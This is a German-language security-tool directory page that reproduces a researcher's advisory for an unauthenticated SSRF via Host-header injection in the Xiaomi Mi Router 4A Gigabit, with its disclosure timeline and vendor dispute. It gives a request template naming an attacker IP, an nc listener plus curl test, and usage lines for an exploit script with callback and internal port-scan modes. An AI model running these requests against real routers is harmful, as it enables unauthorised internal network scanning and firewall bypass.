Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/iwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection
SchwachstellenanalyseExploitationWebanwendungs-ExploitationNetzwerksicherheitPenetrationstestsRed Teaming
GitHubiwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection

CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection

Nicht authentifiziertes SSRF im Xiaomi Mi Router 4A Gigabit Edition (Firmware 3.0.24) durch Host-Header-Injection — CVE-2026-26898

Repository anzeigen
111vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-26898: Xiaomi Mi Router 4A Gigabit - SSRF durch Host-Header-Injection

Vulnerability CVSS Status Vendor

Zusammenfassung

Es besteht eine Server-Side-Request-Forgery-(SSRF)-Sicherheitslücke im Xiaomi Mi Router 4A Gigabit Edition. Die Weboberfläche des Routers validiert den HTTP Host-Header nicht, sodass ein nicht authentifizierter Angreifer den Router dazu zwingen kann, beliebige ausgehende TCP-Verbindungen herzustellen.

FeldWert
GerätXiaomi Mi Router 4A Gigabit Edition
Firmware3.0.24 (International)
CVECVE-2026-26898 (angefochten — siehe Offenlegungsstatus unten)
CWECWE-918 (Server-Side Request Forgery)
CVSS 3.18.6 (Hoch) — vom Forscher bewertet; Hersteller bestreitet Schweregrad

Herstellerantwort & Offenlegungsstatus

Status: Vom Hersteller bestritten — dieser Bericht wurde nicht von Xiaomi akzeptiert.

  • An Xiaomi gemeldet über HackerOne (Bericht #3513458) am 2026-01-16.
  • Am 2026-01-23 schloss Xiaomi den Bericht als Informativ, mit der Begründung, es handele sich um ein bereits bekanntes Problem, der Router "verlasse sich weiterhin auf die Proxy-Funktion", und sie stuften es als niedriges Risiko ein und werden es nicht beheben.
  • Position des Forschers: Die Schweregradeinstufung wird bestritten. Das Gerät wird weiterhin aktiv auf offiziellen Xiaomi-Kanälen (mi.com/tr) verkauft (Stand Januar 2026), der Endpunkt ist ohne Authentifizierung erreichbar, und die SSRF ermöglicht das Scannen interner Netzwerke und den Zugriff auf Dienste, die lokalen Verbindungen vertrauen. Das Verhalten bleibt ungepatcht.

CVE-2026-26898 wird hier nur zur Nachverfolgung verwendet; angesichts des Streits mit dem Hersteller sollte es als angefochten / unbestätigt betrachtet werden, nicht als herstellerbestätigt.

Betroffener Endpunkt

root@kitploit:~
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ANGREIFER_IP>:<PORT>

Proof of Concept

Screenshot

Exploit Demo

Schnelltest

root@kitploit:~
python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check

Ausgabe

root@kitploit:~
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444

Manueller Test

root@kitploit:~
# Terminal 1: Start listener
nc -l 4444

# Terminal 2: Send malicious request
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"

Auswirkungen

  • Internes Netzwerk-Scannen: Router als Proxy zum Scannen interner Netzwerke nutzen
  • Firewall-Umgehung: Zugriff auf Dienste, die auf die Router-IP beschränkt sind
  • Angriffskette: Kann mit anderen Sicherheitslücken für RCE kombiniert werden

Dateien

DateiBeschreibung
xiaomi_ssrf_exploit.pyVollständiger Exploit mit mehreren Modi

Exploit-Verwendung

root@kitploit:~
# Check if vulnerable
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --check

# Callback mode
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --callback YOUR_IP --port 4444

# Port scanner
python3 xiaomi_ssrf_exploit.py --target ROUTER_IP --scan TARGET_IP --ports 22,23,80,443

Zeitplan

DatumEreignis
2026-01-15Sicherheitslücke entdeckt; PoC entwickelt
2026-01-16An Xiaomi über HackerOne gemeldet (#3513458)
2026-01-23Xiaomi schloss den Bericht als Informativ (niedriges Risiko, wird nicht behoben)
2026-06-03Öffentliche Sicherheitsmeldung veröffentlicht (dieses Repository) — herstellerbestritten, ungepatcht

Referenzen

  • HackerOne-Bericht #3513458 (an Xiaomi eingereicht; als Informativ geschlossen)
  • CWE-918: Server-Side Request Forgery (SSRF)

Haftungsausschluss

Dieser Exploit wird nur zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal.

Autor

Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace

Tool herunterladen